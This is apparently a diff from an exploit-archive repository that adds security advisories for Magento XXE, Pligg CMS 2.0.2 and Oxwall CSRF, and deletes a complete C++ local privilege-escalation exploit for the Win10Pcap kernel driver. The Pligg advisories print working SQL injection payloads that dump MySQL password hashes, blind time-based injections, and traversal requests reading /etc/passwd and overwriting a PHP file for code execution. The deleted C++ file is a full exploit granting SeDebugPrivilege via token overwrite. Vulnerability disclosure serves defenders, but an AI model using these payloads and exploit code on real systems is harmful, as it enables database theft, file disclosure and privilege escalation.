SOLUTION +------------------------- + +eBay Magento was informed about the issue and assigned it a reference ID of +APPSEC-1045. eBay released a patch bundle titled: + +'SUPEE-6788 Patch Bundle' + +prior to the release of this advisory. +To address the vulnerability, the patch should be installed, or Magento +should be upgraded to the latest version of 1.9.2.2 which already contains +the fix. + +IX. REFERENCES +------------------------- + +http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt + +http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt + +http://framework.zend.com/security/advisory/ZF2015-06 + +Powering Magento with Ngnix and PHP-FPM: +http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf + +http://www.securiteam.com/ + +Official eBay Magento website: +http://magento.com/ + +Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML +Functionality Using Multibyte Payloads' (APPSEC-1045) is available at: + +http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html + + +X. DISCOVERED BY +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +legalhackers.com + +XI. REVISION HISTORY +------------------------- + +Oct 29th, 2015: Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/php/webapps/38574.html b/platforms/php/webapps/38574.html new file mode 100755 index 000000000..627ac5af0 --- /dev/null +++ b/platforms/php/webapps/38574.html @@ -0,0 +1,100 @@ + + + + + + + +
+ + + + + + + + + +
+ + + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/38577.txt b/platforms/php/webapps/38577.txt new file mode 100755 index 000000000..466650824 --- /dev/null +++ b/platforms/php/webapps/38577.txt @@ -0,0 +1,149 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Pligg CMS 2.0.2 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://pligg.com/ +Vulnerability Type: SQL Injection +Remote Exploitable: Yes +Reported to vendor: 09/01/2015 +Disclosed to public: 10/07/2015 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of +them does not require any credentials, and allows the direct extraction of data +from the database. + +3. SQL Injection + +Description + +Pligg CMS is vulnerable to SQL injection. It is possible to extract data from +all databases that the pligg database user has access to. + +Credentials are not required. + +Proof Of Concept + + +http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23 + +Code + + +/story.php:168 +if(isset($_GET['reply']) && !empty($parent_comment_id)){ + $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id'])); + $main_smarty->assign('parrent_comment_id',$parent_comment_id); +} +[...] +function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){ + Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments; + + //Set comment order to 1 if it's not set in the admin panel + if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180); + elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder']; + + if (!isset($CommentOrder)) $CommentOrder = 1; + If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";} + If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";} + If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";} + If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";} + +[...] + + $comments = $db->get_results("SELECT * + FROM " . table_comments . " + WHERE (comment_status='published' $status_sql) AND + comment_link_id=$link->id AND comment_id = $comment_id + ORDER BY " . $CommentOrderBy); + +4. Blind SQL Injection (Admin Area) + +Description + +There is a blind SQL Injection in the admin area of Pligg CMS. This allows an +attacker that gained admin credentials to extract data from the database. + +The problem exists because the index of the submitted "enabled" POST array is +used in a query. The value is escaped - so using quotes in the injection is not +possible - but it does not place the value in between quotes. + +Proof Of Concept + + +POST /pligg-cms-master/admin/admin_users.php HTTP/1.1 + +frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1 + +Code + + +// admin/admin_users.php +foreach($_POST["enabled"] as $id => $valuea) +{ + $_GET['id'] = $id = $db->escape($id); + $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id"); + +5. Possibly SQL Injection + +Description + +The upload module is vulnerable to Blind SQL Injection via the "comment" as +well as "id" parameter. + +The module seems to be unused at the moment, but if it were to be used in the +future, or if an attacker finds a different way to execute it, it would be +vulnerable. + +The requests to trigger the vulnerabilities would be: + +POST http://localhost/pligg-cms-master/modules/upload/upload.php +id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23 + +POST http://localhost/pligg-cms-master/modules/upload/upload.php +id=1&number=1&comment=1 + +Code + + +./modules/upload/upload.php: +if ($_POST['id']) +{ + $linkres=new Link; + $linkres->id = sanitize($_POST['id'], 3); + if(!is_numeric($linkres->id)) die("Wrong ID"); + if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number"); + if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files"); + + // Remove old file and thumbnails with same number + $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'"; + +The first problem is that $_POST[comment] is never sanitized. + +The second problem is that $_POST['id'] is first sanitized by removing tags, +then it is checked if that result is nummeric, and finally the original POST +value is used. Because of this, it is possible to put the injection inside tags +to bypass the check. + +6. Solution + +This issue was not fixed by the vendor. + +7. Report Timeline + +09/01/2015 Informed Vendor about Issue (no reply) +09/22/2015 Reminded Vendor of disclosure date +09/22/2015 Vendor replied, issue has been send to staff +09/29/2015 Reminded Vendor of disclosure date (no reply) +10/07/2015 Disclosed to public + + +Blog Reference: +http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html \ No newline at end of file diff --git a/platforms/php/webapps/38578.txt b/platforms/php/webapps/38578.txt new file mode 100755 index 000000000..b179e7934 --- /dev/null +++ b/platforms/php/webapps/38578.txt @@ -0,0 +1,46 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Pligg CMS 2.0.2 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://pligg.com/ +Vulnerability Type: Directory Traversal +Remote Exploitable: Yes +Reported to vendor: 09/01/2015 +Disclosed to public: 10/07/2015 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Vulnerability Description + +The editor delivered with Pligg CMS is vulnerable to directory traversal, which +gives an attacker that obtained admin credentials the opportunity to view any +file stored on the webserver that the webserver user has access to. + +Please note that admin credentials are required. + +3. Proof of Concept + + +POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 + +the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open + +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +09/01/2015 Informed Vendor about Issue (no reply) +09/22/2015 Reminded Vendor of disclosure date +09/22/2015 Vendor replied, issue has been send to staff +09/29/2015 Reminded Vendor of disclosure date (no reply) +10/07/2015 Disclosed to public + + +Blog Reference: +http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html \ No newline at end of file diff --git a/platforms/php/webapps/38579.txt b/platforms/php/webapps/38579.txt new file mode 100755 index 000000000..813400db8 --- /dev/null +++ b/platforms/php/webapps/38579.txt @@ -0,0 +1,52 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: Pligg CMS 2.0.2 +Fixed in: not fixed +Fixed Version Link: n/a +Vendor Website: http://pligg.com/ +Vulnerability Type: Code Execution & CSRF +Remote Exploitable: Yes +Reported to vendor: 09/01/2015 +Disclosed to public: 10/07/2015 +Release mode: Full Disclosure +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Vulnerability Description + +The file editor provides the possibility to edit .tpl files stored in the +templates directory. + +But the file editor is vulnerable to directory traversal when saving files, and +it does not check the submitted filename against a whitelist of allowed files. +It also does not check the file extension. Because of this, it is possible to +gain code execution. + +Admin credentials are required to access the file editor, but the request does +not have CSRF protection, so an attacker can gain code execution by getting the +admin to visit a website they control while logged in. + +3. Proof of Concept + + +POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 + +the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=&isempty=1&save=Save+Changes + +4. Solution + +This issue was not fixed by the vendor. + +5. Report Timeline + +09/01/2015 Informed Vendor about Issue (no reply) +09/22/2015 Reminded Vendor of disclosure date +09/22/2015 Vendor replied, issue has been send to staff +09/29/2015 Reminded Vendor of disclosure date (no reply) +10/07/2015 Disclosed to public + + +Blog Reference: +http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html \ No newline at end of file diff --git a/platforms/php/webapps/38581.txt b/platforms/php/webapps/38581.txt new file mode 100755 index 000000000..77e06260c --- /dev/null +++ b/platforms/php/webapps/38581.txt @@ -0,0 +1,58 @@ +Advisory ID: HTB23266 +Product: Oxwall +Vendor: http://www.oxwall.org +Vulnerable Version(s): 1.7.4 and probably prior +Tested Version: 1.7.4 +Advisory Publication: July 1, 2015 [without technical details] +Vendor Notification: July 1, 2015 +Vendor Patch: September 8, 2015 +Public Disclosure: October 22, 2015 +Vulnerability Type: Cross-Site Request Forgery [CWE-352] +CVE Reference: CVE-2015-5534 +Risk Level: High +CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L] +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors. + +The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website. + +A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor: + + +
+ + + + + +
+ + + +----------------------------------------------------------------------------------------------- + +Solution: + +Update to Oxwall 1.8 + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall. +[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/windows/dos/38542.cpp b/platforms/windows/dos/38542.cpp deleted file mode 100755 index 1361d870b..000000000 --- a/platforms/windows/dos/38542.cpp +++ /dev/null @@ -1,205 +0,0 @@ -# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit - -/* -Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address - -you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code - -IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1" - -ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES - -overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS) -#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) -#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) - -/* found with : -!token -1: kd> dt nt!_OBJECT_HEADER - +0x000 PointerCount : Int4B - +0x004 HandleCount : Int4B - +0x004 NextToFree : Ptr32 Void - +0x008 Lock : _EX_PUSH_LOCK - +0x00c TypeIndex : UChar - +0x00d TraceFlags : UChar - +0x00e InfoMask : UChar - +0x00f Flags : UChar - +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION - +0x010 QuotaBlockCharged : Ptr32 Void - +0x014 SecurityDescriptor : Ptr32 Void - +0x018 Body : _QUAD - -TypeIndex is 0x5 -*/ -#define HANDLE_TYPE_TOKEN 0x5 - - -// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation -const SYSTEM_INFORMATION_CLASS SystemHandleInformation = -(SYSTEM_INFORMATION_CLASS)16; - -// The NtQuerySystemInformation function and the structures that it returns -// are internal to the operating system and subject to change from one -// release of Windows to another. To maintain the compatibility of your -// application, it is better not to use the function. -typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)( - IN SYSTEM_INFORMATION_CLASS SystemInformationClass, - OUT PVOID SystemInformation, - IN ULONG SystemInformationLength, - OUT PULONG ReturnLength OPTIONAL - ); - -// Undocumented structure: SYSTEM_HANDLE_INFORMATION -typedef struct _SYSTEM_HANDLE -{ - ULONG ProcessId; - UCHAR ObjectTypeNumber; - UCHAR Flags; - USHORT Handle; - PVOID Object; - ACCESS_MASK GrantedAccess; -} SYSTEM_HANDLE, *PSYSTEM_HANDLE; - -typedef struct _SYSTEM_HANDLE_INFORMATION -{ - ULONG NumberOfHandles; - SYSTEM_HANDLE Handles[1]; -} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; - - -// Undocumented FILE_INFORMATION_CLASS: FileNameInformation -const FILE_INFORMATION_CLASS FileNameInformation = -(FILE_INFORMATION_CLASS)9; - -// The NtQueryInformationFile function and the structures that it returns -// are internal to the operating system and subject to change from one -// release of Windows to another. To maintain the compatibility of your -// application, it is better not to use the function. -typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)( - IN HANDLE FileHandle, - OUT PIO_STATUS_BLOCK IoStatusBlock, - OUT PVOID FileInformation, - IN ULONG Length, - IN FILE_INFORMATION_CLASS FileInformationClass - ); - -// FILE_NAME_INFORMATION contains name of queried file object. -typedef struct _FILE_NAME_INFORMATION { - ULONG FileNameLength; - WCHAR FileName[1]; -} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; - - -void* FindTokenAddressHandles(ULONG pid) -{ - ///////////////////////////////////////////////////////////////////////// - // Prepare for NtQuerySystemInformation and NtQueryInformationFile. - // - - // The functions have no associated import library. You must use the - // LoadLibrary and GetProcAddress functions to dynamically link to - // ntdll.dll. - - HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll")); - assert(hNtDll != NULL); - - PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = - (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, - "NtQuerySystemInformation"); - assert(NtQuerySystemInformation != NULL); - - - ///////////////////////////////////////////////////////////////////////// - // Get system handle information. - // - - DWORD nSize = 4096, nReturn; - PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) - HeapAlloc(GetProcessHeap(), 0, nSize); - - // NtQuerySystemInformation does not return the correct required buffer - // size if the buffer passed is too small. Instead you must call the - // function while increasing the buffer size until the function no longer - // returns STATUS_INFO_LENGTH_MISMATCH. - while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, - nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH) - { - HeapFree(GetProcessHeap(), 0, pSysHandleInfo); - nSize += 4096; - pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc( - GetProcessHeap(), 0, nSize); - } - - for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++) - { - - PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]); - - if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN) - { - printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object); - return pHandle->Object; - } - } - - ///////////////////////////////////////////////////////////////////////// - // Clean up. - // - HeapFree(GetProcessHeap(), 0, pSysHandleInfo); - - return 0; -} - -void main() -{ - DWORD dwBytesReturned; - DWORD ShellcodeFakeMemory; - HANDLE token; - - - // first create toke handle so find object address with handle - if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token)) - DebugBreak(); - - void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId()); - - CloseHandle(token); - - // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :) - HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - if(hDriver!=INVALID_HANDLE_VALUE) - { - fprintf(stderr," Open Driver OK\n"); - - if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL)) - { - fprintf(stderr,"send IOCTL error %d.\n",GetLastError()); - return; - } - else fprintf(stderr," Send IOCTL OK\n"); - } - - else - { - fprintf(stderr," Open Driver error %d.\n",GetLastError()); - return; - } - - - CloseHandle(hDriver); - getchar(); - -} \ No newline at end of file